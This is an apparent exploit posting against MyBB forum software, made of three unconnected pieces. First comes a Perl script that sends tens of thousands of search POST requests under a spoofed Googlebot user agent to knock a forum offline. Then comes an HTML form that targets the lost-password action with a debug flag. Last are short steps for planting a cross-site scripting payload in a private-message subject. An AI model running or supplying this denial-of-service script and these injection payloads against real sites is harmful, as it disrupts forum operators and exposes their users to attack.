#!/usr/bin/perl
#####################################
# MyBB Search Denial of Service
# Code Written By ZoL64R 
# KamikaZ Security Team 
# ISRAEL
#####################################
use IO::Socket;

$host = $ARGV[0];
$path = $ARGV[1];

if(!$ARGV[1])
{
    print "#################################################\n";
    print "## MyBB Search Denial of Service\n";
    print "## Discoverd By ZoL64R.\n";
    print "#################################################\n";
    print "## [host] [path] \n";
    print "## host.com /mybb\n";
    print "#################################################\n";
    exit();
}
for($i=0; $i<99999; $i++)
{
    $socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $host, PeerPort => "80") or die("[-] Connection faild.\n");
    $post = "action=do_search&keywords=KamikaZ-Team&postthread=1&author=&matchusername=1&forums%5B%5D=all&findthreadst=1&numreplies=&postdate=0&pddir=1&sortby=lastpost&sorder=desc&showresults=threads&submit=Search";
    $pack.= "POST " .$path. "/search.php HTTP/1.1\r\n";
    $pack.= "Host: " .$host. "\r\n";
    $pack.= "User-Agent: Googlebot/2.1\r\n";
    $pack.= "Content-Type: application/x-www-form-urlencoded\r\n";
    $pack.= "Content-Length: " .length($post). "\r\n\r\n";
    $pack.= $post;
    print $socket $pack;
    syswrite STDOUT, "+";
}

<form action="http://website/mybb_dir/member.php?debug=1"; method="post">
<table border="0" cellspacing="1" cellpadding="4" class="tborder">
<tr>
<td class="trow1" width="40%"><strong>Email Address:</strong></td>
<td class="trow1" width="60%"><input type="text" class="textbox" name="email" /></td>
</tr>
<tr><td wlign=center>
<input type="hidden" name="action" value="do_lostpw" />
<input type="submit" class="button" value="Enter Here" />
</td></tr>
</table>
</form>

First of all user must be REGISTERED and authorized
- Go to http://target/mybbpath/private.php
- Inster your xss code for Subject

javasc ript:alert(123)